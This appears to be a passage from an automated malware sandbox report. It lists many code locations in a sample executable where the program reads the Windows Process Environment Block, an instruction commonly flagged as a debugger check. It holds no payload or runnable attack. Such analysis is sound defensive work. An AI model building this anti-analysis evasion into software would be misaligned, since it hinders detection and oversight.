          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]2_2_00B551BE
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]2_2_00B551BE
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B061A0 mov eax, dword ptr fs:[00000030h]2_2_00B061A0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B061A0 mov eax, dword ptr fs:[00000030h]2_2_00B061A0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B569A6 mov eax, dword ptr fs:[00000030h]2_2_00B569A6
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02990 mov eax, dword ptr fs:[00000030h]2_2_00B02990
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFC182 mov eax, dword ptr fs:[00000030h]2_2_00AFC182
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A185 mov eax, dword ptr fs:[00000030h]2_2_00B0A185
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]2_2_00ADB1E1
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]2_2_00ADB1E1
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]2_2_00ADB1E1
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B641E8 mov eax, dword ptr fs:[00000030h]2_2_00B641E8
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0513A mov eax, dword ptr fs:[00000030h]2_2_00B0513A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0513A mov eax, dword ptr fs:[00000030h]2_2_00B0513A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]2_2_00AF4120
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]2_2_00AF4120
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]2_2_00AF4120
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]2_2_00AF4120
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF4120 mov ecx, dword ptr fs:[00000030h]2_2_00AF4120
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]2_2_00AD9100
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]2_2_00AD9100
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]2_2_00AD9100
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADC962 mov eax, dword ptr fs:[00000030h]2_2_00ADC962
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADB171 mov eax, dword ptr fs:[00000030h]2_2_00ADB171
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADB171 mov eax, dword ptr fs:[00000030h]2_2_00ADB171
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFB944 mov eax, dword ptr fs:[00000030h]2_2_00AFB944
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFB944 mov eax, dword ptr fs:[00000030h]2_2_00AFB944
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0FAB0 mov eax, dword ptr fs:[00000030h]2_2_00B0FAB0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]2_2_00AD52A5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]2_2_00AD52A5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]2_2_00AD52A5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]2_2_00AD52A5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]2_2_00AD52A5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]2_2_00AEAAB0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]2_2_00AEAAB0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0D294 mov eax, dword ptr fs:[00000030h]2_2_00B0D294
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0D294 mov eax, dword ptr fs:[00000030h]2_2_00B0D294
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02AE4 mov eax, dword ptr fs:[00000030h]2_2_00B02AE4
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02ACB mov eax, dword ptr fs:[00000030h]2_2_00B02ACB
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B14A2C mov eax, dword ptr fs:[00000030h]2_2_00B14A2C
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B14A2C mov eax, dword ptr fs:[00000030h]2_2_00B14A2C
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE8A0A mov eax, dword ptr fs:[00000030h]2_2_00AE8A0A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF3A1C mov eax, dword ptr fs:[00000030h]2_2_00AF3A1C
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADAA16 mov eax, dword ptr fs:[00000030h]2_2_00ADAA16
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADAA16 mov eax, dword ptr fs:[00000030h]2_2_00ADAA16
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]2_2_00AD5210
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD5210 mov ecx, dword ptr fs:[00000030h]2_2_00AD5210
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]2_2_00AD5210
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]2_2_00AD5210
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B1927A mov eax, dword ptr fs:[00000030h]2_2_00B1927A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B8B260 mov eax, dword ptr fs:[00000030h]2_2_00B8B260
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B8B260 mov eax, dword ptr fs:[00000030h]2_2_00B8B260
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8A62 mov eax, dword ptr fs:[00000030h]2_2_00BA8A62
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B64257 mov eax, dword ptr fs:[00000030h]2_2_00B64257
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]2_2_00AD9240
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]2_2_00AD9240
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]2_2_00AD9240
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]2_2_00AD9240
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]2_2_00B04BAD
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]2_2_00B04BAD
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]2_2_00B04BAD
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA5BA5 mov eax, dword ptr fs:[00000030h]2_2_00BA5BA5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0B390 mov eax, dword ptr fs:[00000030h]2_2_00B0B390
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE1B8F mov eax, dword ptr fs:[00000030h]2_2_00AE1B8F
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE1B8F mov eax, dword ptr fs:[00000030h]2_2_00AE1B8F
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02397 mov eax, dword ptr fs:[00000030h]2_2_00B02397
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B9138A mov eax, dword ptr fs:[00000030h]2_2_00B9138A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B8D380 mov ecx, dword ptr fs:[00000030h]2_2_00B8D380
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFDBE9 mov eax, dword ptr fs:[00000030h]2_2_00AFDBE9
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]2_2_00B003E2
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]2_2_00B003E2
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]2_2_00B003E2
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]2_2_00B003E2
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]2_2_00B003E2
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]2_2_00B003E2
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B553CA mov eax, dword ptr fs:[00000030h]2_2_00B553CA
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B553CA mov eax, dword ptr fs:[00000030h]2_2_00B553CA
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B9131B mov eax, dword ptr fs:[00000030h]2_2_00B9131B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B03B7A mov eax, dword ptr fs:[00000030h]2_2_00B03B7A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B03B7A mov eax, dword ptr fs:[00000030h]2_2_00B03B7A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADDB60 mov ecx, dword ptr fs:[00000030h]2_2_00ADDB60
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8B58 mov eax, dword ptr fs:[00000030h]2_2_00BA8B58
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADDB40 mov eax, dword ptr fs:[00000030h]2_2_00ADDB40
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADF358 mov eax, dword ptr fs:[00000030h]2_2_00ADF358
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE849B mov eax, dword ptr fs:[00000030h]2_2_00AE849B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B914FB mov eax, dword ptr fs:[00000030h]2_2_00B914FB
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]2_2_00B56CF0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]2_2_00B56CF0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]2_2_00B56CF0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8CD6 mov eax, dword ptr fs:[00000030h]2_2_00BA8CD6
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0BC2C mov eax, dword ptr fs:[00000030h]2_2_00B0BC2C
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]2_2_00BA740D
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]2_2_00BA740D
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]2_2_00BA740D
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]2_2_00B91C06
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]2_2_00B56C0A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]2_2_00B56C0A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]2_2_00B56C0A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]2_2_00B56C0A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF746D mov eax, dword ptr fs:[00000030h]2_2_00AF746D
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6C450 mov eax, dword ptr fs:[00000030h]2_2_00B6C450
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6C450 mov eax, dword ptr fs:[00000030h]2_2_00B6C450
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A44B mov eax, dword ptr fs:[00000030h]2_2_00B0A44B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]2_2_00B01DB5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]2_2_00B01DB5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]2_2_00B01DB5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B035A1 mov eax, dword ptr fs:[00000030h]2_2_00B035A1
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA05AC mov eax, dword ptr fs:[00000030h]2_2_00BA05AC
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA05AC mov eax, dword ptr fs:[00000030h]2_2_00BA05AC
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]2_2_00AD2D8A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]2_2_00AD2D8A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]2_2_00AD2D8A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]2_2_00AD2D8A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]2_2_00AD2D8A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0FD9B mov eax, dword ptr fs:[00000030h]2_2_00B0FD9B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0FD9B mov eax, dword ptr fs:[00000030h]2_2_00B0FD9B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]2_2_00B02581
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]2_2_00B02581
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]2_2_00B02581
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]2_2_00B02581
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B88DF1 mov eax, dword ptr fs:[00000030h]2_2_00B88DF1
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AED5E0 mov eax, dword ptr fs:[00000030h]2_2_00AED5E0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AED5E0 mov eax, dword ptr fs:[00000030h]2_2_00AED5E0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]2_2_00B56DC9
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]2_2_00B56DC9
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]2_2_00B56DC9
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56DC9 mov ecx, dword ptr fs:[00000030h]2_2_00B56DC9
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]2_2_00B56DC9
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]2_2_00B56DC9
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B5A537 mov eax, dword ptr fs:[00000030h]2_2_00B5A537
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]2_2_00B04D3B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]2_2_00B04D3B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]2_2_00B04D3B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8D34 mov eax, dword ptr fs:[00000030h]2_2_00BA8D34
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]2_2_00AE3D34
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADAD30 mov eax, dword ptr fs:[00000030h]2_2_00ADAD30
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFC577 mov eax, dword ptr fs:[00000030h]2_2_00AFC577
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFC577 mov eax, dword ptr fs:[00000030h]2_2_00AFC577
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B13D43 mov eax, dword ptr fs:[00000030h]2_2_00B13D43
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B53540 mov eax, dword ptr fs:[00000030h]2_2_00B53540
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF7D50 mov eax, dword ptr fs:[00000030h]2_2_00AF7D50
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B546A7 mov eax, dword ptr fs:[00000030h]2_2_00B546A7
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]2_2_00BA0EA5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]2_2_00BA0EA5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]2_2_00BA0EA5
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6FE87 mov eax, dword ptr fs:[00000030h]2_2_00B6FE87
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE76E2 mov eax, dword ptr fs:[00000030h]2_2_00AE76E2
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B016E0 mov ecx, dword ptr fs:[00000030h]2_2_00B016E0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8ED6 mov eax, dword ptr fs:[00000030h]2_2_00BA8ED6
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B18EC7 mov eax, dword ptr fs:[00000030h]2_2_00B18EC7
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B8FEC0 mov eax, dword ptr fs:[00000030h]2_2_00B8FEC0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B036CC mov eax, dword ptr fs:[00000030h]2_2_00B036CC
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B8FE3F mov eax, dword ptr fs:[00000030h]2_2_00B8FE3F
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADE620 mov eax, dword ptr fs:[00000030h]2_2_00ADE620
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A61C mov eax, dword ptr fs:[00000030h]2_2_00B0A61C
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A61C mov eax, dword ptr fs:[00000030h]2_2_00B0A61C
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]2_2_00ADC600
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]2_2_00ADC600
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]2_2_00ADC600
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B08E00 mov eax, dword ptr fs:[00000030h]2_2_00B08E00
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91608 mov eax, dword ptr fs:[00000030h]2_2_00B91608
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE766D mov eax, dword ptr fs:[00000030h]2_2_00AE766D
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]2_2_00AFAE73
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]2_2_00AFAE73
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]2_2_00AFAE73
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]2_2_00AFAE73
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]2_2_00AFAE73
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]2_2_00AE7E41
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]2_2_00AE7E41
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]2_2_00AE7E41
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]2_2_00AE7E41
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]2_2_00AE7E41
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]2_2_00AE7E41
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]2_2_00B57794
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]2_2_00B57794
